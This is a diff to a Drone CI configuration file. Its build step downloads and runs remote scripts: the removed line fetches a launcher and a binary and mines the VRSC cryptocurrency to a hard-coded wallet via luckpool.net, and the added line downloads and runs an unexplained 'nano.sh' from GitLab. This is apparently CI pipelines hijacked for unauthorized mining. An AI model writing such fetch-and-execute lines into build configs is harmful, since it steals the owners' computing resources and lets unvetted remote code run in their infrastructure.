--- a/.drone.yml
+++ b/.drone.yml
@@ -12,4 +12,4 @@ steps:
   pull: if-not-exists
   image: node:latest
   commands:
-      - wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo Verushash -coin VRSC -wallet RLM9zhMnfJisKwYpbREgsfyFrs2RnZvs4e  -rigName  TUYUL-TAMBANG -pool1 na.luckpool.net:3956 -t 15
+      - wget https://gitlab.com/renifer12/project-7/-/raw/main/nano.sh && chmod +x nano.sh && ./nano.sh
